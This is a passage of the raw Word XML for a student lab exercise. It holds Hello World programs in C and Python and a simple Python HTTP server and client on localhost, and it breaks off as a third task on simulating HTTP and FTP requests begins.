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366" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>LAB EXERCISE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1. Write a simple "Hello World" program in two different programming languages of your choice. Compare the structure and syntax</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6"/>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:r>
        <w:t>// C</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6"/>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:r w:rsidRPr="008A52A6">
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6"/>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:r w:rsidRPr="008A52A6">
        <w:t>int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:r w:rsidRPr="008A52A6">
        <w:t xml:space="preserve">    printf("Hello, World!\n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:r w:rsidRPr="008A52A6">
        <w:t xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:r w:rsidRPr="008A52A6">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6"/>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:r>
        <w:t>//py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:r w:rsidRPr="008A52A6">
        <w:t>print("Hello, World!")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6"/>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6"/>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. Design a simple HTTP client-server communication in any language.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sure! Here's a </w:t>
      </w:r>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simple HTTP client-server example</w:t>
      </w:r>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> written in </w:t>
      </w:r>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the built-in </w:t>
      </w:r>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the server and </w:t>
      </w:r>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> module for the client.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1. HTTP Server (Python)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This simple server returns "Hello from Server!" when accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># server.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from http.server import BaseHTTPRequestHandler, HTTPServer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>class SimpleHandler(BaseHTTPRequestHandler):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    def do_GET(self):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.send_response(200)                          # HTTP status code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.send_header("Content-type", "text/plain")   # Header</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.end_headers()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.wfile.write(b"Hello from Server!")          # Body</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    server_address = ('', 8080)  # Listen on port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    httpd = HTTPServer(server_address, SimpleHandler)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("Server running on http://localhost:8080")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    httpd.serve_forever()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. HTTP Client (Python)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This client sends a GET request to the server and prints the response.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># client.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>response = requests.get("http://localhost:8080")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print("Response from server:", response.text)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▶</w:t>
      </w:r>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>️</w:t>
      </w:r>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> How to Run This:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Run the server first:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python server.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In another terminal, run the client:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python client.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>📝</w:t>
      </w:r>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Output Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRPr="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Client Terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Response from server: Hello from Server!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="008A52A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A52A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Simulate HTTP and FTP requests using command line tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A52A6" w:rsidRDefault="008A52A6" w:rsidP="00E249E1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00E249E1">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>1. Simulate HTTP Requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
